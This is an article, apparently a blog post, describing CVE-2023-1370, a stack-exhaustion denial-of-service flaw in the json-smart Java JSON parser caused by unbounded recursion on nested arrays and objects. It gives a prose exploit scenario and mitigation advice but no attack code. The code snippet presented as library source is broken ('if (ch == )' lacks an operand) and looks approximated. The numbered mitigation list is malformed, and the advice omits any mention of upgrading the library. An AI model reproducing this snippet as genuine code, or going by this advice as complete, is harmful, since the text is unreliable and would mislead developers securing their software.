CVE-2023-1370: Stack Exhaustion Vulnerability in json-smart JSON Parser Library

Json-smart is a high-performance, lightweight JSON processor library. It is designed to process JSON data efficiently with a focus on performance. This library comes with a set of handy features such as easy parsing and serialization, JSONPath implementation, and support for various encoding types.

Unfortunately, a new vulnerability (CVE-2023-1370) has been discovered in json-smart that can lead to a stack exhaustion attack, causing a stack overflow and crashing the software. This vulnerability exists in the library's handling of nested arrays and objects in a JSON input.

In this article, we will discuss the details of the CVE-2023-1370 vulnerability, what it means for developers and users of json-smart, and recommended mitigation steps.

Vulnerability Details

The vulnerability is present in the code's handling of JSONArrays and JSONObjects. When parsing a JSON input, the json-smart library encounters either a [ or { character, it recursively processes the array or object. However, the code does not place any limit on the number of nested arrays or objects, which can lead to stack exhaustion if the input JSON has too many nested layers.

Here is a code snippet from the json-smart library, outlining the problem

private void readArray(JsonParserBase p, JsonSmartFactory factory) throws IOException {
   ...
   while (true) {
      ch = p.nextCleanInline();
      if (ch == )
         break;
      if (ch == ',')
         continue;
      if (ch == ']')
         break;
      p.back();
      this.add(p.readValue(factory));
   }
}

As you can see from the code above, when reading an array, the library continues to parse nested arrays recursively, without any limitation on the depth of nesting. The same issue is also present when parsing JSONObjects.

Exploit Scenario

An attacker can leverage this vulnerability by supplying a specially crafted JSON input containing a deeply nested structure of arrays or objects. The recursion depth will cause a stack overflow, crashing the application and potentially sparking a denial of service (DoS) attack.

Original References

1. Json-smart library: https://netplex.github.io/json-smart/
2. CVE details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1370

Mitigation Steps

To protect your application from this vulnerability, it is recommended that you limit the depth of nested structures in your JSON input. You can do this by either:

Implementing a custom JSON parser that enforces a maximum depth limit for the JSON input.

2. Switching to a different JSON parsing library that has built-in depth limits, such as Jackson or Gson.

Conclusion

The CVE-2023-1370 vulnerability in json-smart is a serious issue that can have severe consequences for applications relying on the library for JSON processing. It is essential to apply the mitigation steps detailed in this article, as leaving the vulnerability unaddressed can result in stack overflows and potential denial of service attacks. As a developer or user of json-smart, staying informed and taking the necessary precautions will ensure the security and stability of your software.

Timeline

Published on: 03/22/2023 06:15:00 UTC
Last modified on: 03/29/2023 19:02:00 UTC